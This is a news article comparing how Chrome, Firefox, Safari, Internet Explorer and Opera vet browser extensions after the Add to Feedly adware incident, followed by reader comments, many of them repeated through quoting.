After Chrome’s recent extension drama, what browser has the safest add-ons?

Customers complain about activity tracking in CRXMouse on Chrome, a particularly invasive add-on.

In a recent revelation by OMG Chrome and the developer of the Chrome extension Add to Feedly, it came to light that Chrome extensions are capable of changing service or ownership under a user’s nose without much notification. In the case of Add to Feedly, a buyout meant thousands of users were suddenly subjected to injected adware and redirected links.

Chrome’s regulations for existing extensions are set to change in June 2014. The changes should prevent extensions from being anything but “simple and single-purpose in nature,” with a “single visible UI surface” in Chrome and a “single browser action or page action button,” like the extensions made by Pinterest or OneTab.

This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June.

Given how Chrome’s system of updates, design restrictions, and ownership seemed to have gotten ahead of itself, we decided to take a look at the policies of other browsers to see if their extensions could be subjected to a similar fate. While Chrome isn’t the only browser where an Add To Feedly tale could be spun, it seems to be the most likely place for such an outcome.

Firefox

Mozilla’s Firefox differs from Chrome in that it has an involved review system for all extensions that go from developers to the front-end store. Reviewers will reject an extension if it violates any of the rules in Firefox’s extension development documents.

One of these rules is “no surprises”—an add-on can’t do anything it doesn’t disclose to users, and existing add-ons can’t change their functionality without notifying the user and getting their permission.

Firefox puts add-ons with “unexpected” features, like advertising that supports the add-on financially, into a separate category. Users have to explicitly opt-in to these features, says Jonathan Nightingale, vice president of Firefox. “This means that in these cases, users will see a screen offering them the additional features,” says Nightingale. One example is FastestFox, which pops a tab at first install asking the user to enable ad injection from Superfish.

It's how developers implement these opt-in screens that could provide for a possible loophole; the addition of advertising might be obscurable by language, and data tracking could be, too (it's permitted under Firefox’s rules, but it must be disclosed in a privacy policy). Still, the review policy and need for opt-in for these more pernicious features both help prevent users from having new functionality sprung on them.

Safari

Safari has extensive design documents for its extensions but no central clearinghouse for them like other browsers. Apple keeps a “gallery” of a chosen few extensions that must meet certain regulations, but these represent a small fraction of the extensions available.

Data tracking of an extension’s users is possible, per the design docs, as is ad manipulation. Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user. There are no regulations for disclosing functionality changes or changes of ownership, however.

Internet Explorer

Microsoft’s browser absolves itself of responsibility for add-ons on a support page where it states, "While add-ons can make your browsing experience better by giving you access to great Web content, some add-ons can pose security, privacy, or performance risks. Make sure any add-ons you install are from a trusted source." Add on at your own risk.

Like Apple, Microsoft maintains an exclusive gallery of vetted add-ons. The company encourages extension makers to get user consent for unexpected add-on functionality, but it doesn’t require it or block extensions that don’t do it. Markup-based extensions can only be installed from within the browser, and therefore these must have the user’s explicit consent according to Microsoft.

Other than this infrastructure, nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on). IE10 does have an add-on management window, but some add-ons, like the ad-injecting Buzzdcock, have to be removed as if they are full-fledged applications.

Opera

The latest versions of Opera are able to use Chromium extensions, but unlike Chrome ones, they get a review process that’s similar to Firefox’s. Most importantly in Opera, there are restrictions on the types of scripts an extension can run and how they handle ads.

Andreas Bovens, head of developer relations at Opera Software, told Ars in an e-mail that Opera doesn’t “allow extensions that include ads or tracking in content scripts, so extensions that, for example, inject ads inside webpages the user visits are not allowed.” Extensions can, however, have ads in their options pages or in the pop-up that is triggered by their button in the browser’s interface.

Every extension gets a review, and the review team takes special care to suss out the nature of any obfuscated JavaScript code. If some of the code is obfuscated, reviewers ask the developers for the unobfuscated code to look at as well as a link to the obfuscation tool. That way “we can check that the input and output indeed match,” Bovens says.

“When an extension’s ownership is transferred or the extension is updated, it’s subject to the same rigorous review process as an extension that’s being submitted for the first time,” according to Bovens. An extension that goes from having no ads to injecting ads, as some Chrome extensions do, “simply would not pass [Opera’s] review process,” Bovens says.

Retiring to the not-so-Wild West?

While Chrome extensions may have a better ideology than those of some other browsers, the breadth and depth of functionality that Chrome extensions can have without any kind of review process means that Chrome users’ trust can get taken for granted. It’s similar to the Google Play app store, in that way: pretty much anything can make it to the market, but enough user complaints can get it taken down, as in the case of Add to Feedly and Tweet This Page.

Based on policy and practice, users who heavily rely on extensions or have been made wary of them by developers’ recent transgressions may be safer on browsers like Firefox and Opera, where regulations are a bit stricter and there are people to police them. But there can be downsides to a vetting process, too, mainly in terms of rate-limiting iteration and improvements, so it’s a matter of weighing options.

Update: In a statement from Google, the company tells Ars that it uses an "automated, proactive review process" to assess extensions before they go into the store and the company "conduct[s] ongoing scanning" of available extensions.

Promoted Comments

The fact is that dozens of popular extensions, with millions of users, are spying on every single page that you visit. It doesn't matter if you are using Google or your bank. They are sending back the unique URL to a third-party server every time.

Many of these extensions are hiding the code and have a remote-enable trigger for some future date (seriously).

Also, the new Google policy doesn't specifically say that they are going to forbid user tracking extensions, which are tracking every single page that you visit and sending it back to a third-party server... without a UI surface. (There's big money in user tracking) It would be wonderful if they would clear up the confusion and tell everybody that they won't let that happen anymore.

Quote:

nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on)

Former home? This is the current home for an awful lot of crapware add-ons, like Conduit's search hijacker, or the Ask.com toolbar that still hasn't died a thousand deaths, even though it should.

75 Reader Comments

I just assume it was a case of naiveté on the part of Google's design and implementation team. You'd think they'd kind of know better but you have to have sneaky bastards who can think like that in order to plan for it.

I have adblock running (arstechnica excluded!), and saw weird ads popup everywhere, on different websites. Turned out some addon was causing that, and doing different kinds of tracking. Turned that thing off immediately. A while later the developer updated the app with an apology and removed the ads.

The fact is that dozens of popular extensions, with millions of users, are spying on every single page that you visit. It doesn't matter if you are using Google or your bank. They are sending back the unique URL to a third-party server every time.

Many of these extensions are hiding the code and have a remote-enable trigger for some future date (seriously).

Also, the new Google policy doesn't specifically say that they are going to forbid user tracking extensions, which are tracking every single page that you visit and sending it back to a third-party server... without a UI surface. (There's big money in user tracking) It would be wonderful if they would clear up the confusion and tell everybody that they won't let that happen anymore.

Quote:

nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on)

Former home? This is the current home for an awful lot of crapware add-ons, like Conduit's search hijacker, or the Ask.com toolbar that still hasn't died a thousand deaths, even though it should.

"This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June."

How are they going to enforce that? I don't think they can except for the most obvious malwares that are easy to flag.

I will continue to avoid all extension/add-ons except the ones from the biggest companies that I have reasonable confidence in accountability.

"This has always been the policy, per a post to the Chromium blog back in December. " So Chrome had a policy that they never enforced and was something that developers were suppose to adhere to but Google is not going to enforce this policy until June i.e. 5 months from now. Google sounds more like a government every day. What are they waiting for? Are they allowing extensions to harvest more of our data or push more crap upon our browsers?

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...

Firefox would have to use less memory than Chrome before I switch. Improving is one thing but it's still not great.

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...

Firefox would have to use less memory than Chrome before I switch. Improving is one thing but it's still not great.

Agreed. But some of that also depends on which extensions you have installed and how well they handle their own garbage collection and/or unused memory functions.

I had some Chrome extensions, which of course I can't remember the names, that were horrible in that respect.

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...

Firefox would have to use less memory than Chrome before I switch. Improving is one thing but it's still not great.

Firefox certainly does use less memory if you open multiple tabs. I don't know about single tabs (I haven't done a fair test recently) but Chrome's multi-process architecture virtually guarantees it'll use more memory if you have many tabs.

Whether this actually matters is a matter of some debate. On a desktop or even a half-decent modern laptop (where memory is plentiful) I'd be surprised if there was any practical difference that a user would notice.

well, i have recently switched back to Firefox after using Chrome for the last few years. I noticed that the memory usage on Chrome kept going up while the Firefox developers worked on bringing Firefox's down. And with the latest revelations on Chrome extensions, it made even more sense for me to switch back to Firefox.

Everyone has different needs/wants/dreams/etc in a browser.... Firefox just happens to work for me...

Firefox would have to use less memory than Chrome before I switch. Improving is one thing but it's still not great.

Every time I have tried looking at it in the past couple of years, having the same tabs up has never once resulted in Chrome using less memory then FF.

One thing to note, the Windows 8 Metro version of IE 11 (where I spend most of my browsing time) does not allow any 3rd party plugins at all.

I was actually just going to ask if there were any browsers that did this. Now what happens if a person is running the metro-style IE, but attempts to install a plugin? Does it still allow the plugin to be installed in the regular version of IE on the same machine?

Rate-limiting on Firefox updates? Obviously you don't have NoScript installed. I think it updates on a bi-hourly basis.

Just out of curiosity, are you being serious? I use Chrome but after this update junk, I am looking for a different browser. I was thinking of FF.

NoScript does update pretty frequently (daily? every other day?), but I'd rather suffer a developer being too proactive with updates than one who neglects their product.

That aside, the only reason NoScript jumps out is that the developer thoughtfully makes the "Display release notes on update" option checked by default. If you change that setting, it'll quietly update like most other extensions.

One thing to note, the Windows 8 Metro version of IE 11 (where I spend most of my browsing time) does not allow any 3rd party plugins at all.

I was actually just going to ask if there were any browsers that did this. Now what happens if a person is running the metro-style IE, but attempts to install a plugin? Does it still allow the plugin to be installed in the regular version of IE on the same machine?

If you're in the Metro browser it gets ignored. When running the desktop browser it does allow plugins, just like earlier version of IE (sans Windows RT).

Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user.

That's not correct. By default Firefox extensions update automatically. The big difference is that they offer an option to disable that behavior (go to about:addons and click the gear to see the setting).

Safari extensions also need to be signed, so presumably a change of ownership would mean an extension also has to be signed with a new certificate. Unless the developer hands over his AppleID to the new scumbags.

Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user.

That's not correct. By default Firefox extensions update automatically. The big difference is that they offer an option to disable that behavior (go to about:addons and click the gear to see the setting).

"This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June."

How are they going to enforce that? I don't think they can except for the most obvious malwares that are easy to flag.

I will continue to avoid all extension/add-ons except the ones from the biggest companies that I have reasonable confidence in accountability.

I'm in the same boat. NoScripts and Adblock Plus (Ars excepted, of course), and that's it for me. I'm not even running Tab Mix Plus anymore.

Pfft, lightweight. Telnet and a basic understanding of HTTP and HTML is all you need. You get used to it. I don't even see the code. All I see is blond, brunette, redhead. Plus having to calculate CONTENT-LENGTH before entering your comment is a good way to e

"This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June."

How are they going to enforce that? I don't think they can except for the most obvious malwares that are easy to flag.

I will continue to avoid all extension/add-ons except the ones from the biggest companies that I have reasonable confidence in accountability.

I'm in the same boat. NoScripts and Adblock Plus (Ars excepted, of course), and that's it for me. I'm not even running Tab Mix Plus anymore.

NoScript is great, but Adblock always seems too, I dunno, intrusive? I use a cookie blocker (I'm using Cookie Controller) and the "Come Back 'Block Images From ad.sites'" extension instead. I love it.